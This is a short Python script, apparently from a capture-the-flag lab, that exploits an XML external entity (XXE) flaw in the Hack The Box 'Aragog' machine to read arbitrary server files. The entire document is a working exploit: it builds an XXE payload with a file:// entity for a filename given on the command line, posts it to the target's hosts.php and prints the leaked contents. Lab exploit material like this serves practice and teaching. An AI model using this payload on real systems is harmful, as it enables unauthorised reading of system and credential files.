A script to enumerate files through XXE in the Aragog box for HTB.

XXEnumerate.py

import requests as rq
import sys

filename = sys.argv[1]

url = "http://10.10.10.78/hosts.php"

data = """<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file://FD" >]>

<details>
    <subnet_mask>&xxe;</subnet_mask>
    <test></test>
</details>
""".replace("FD",filename)

print "Attempting with file " + filename +"\n#########\n"
r = rq.post(url, data=data)
print (r.text).split("for ")[1]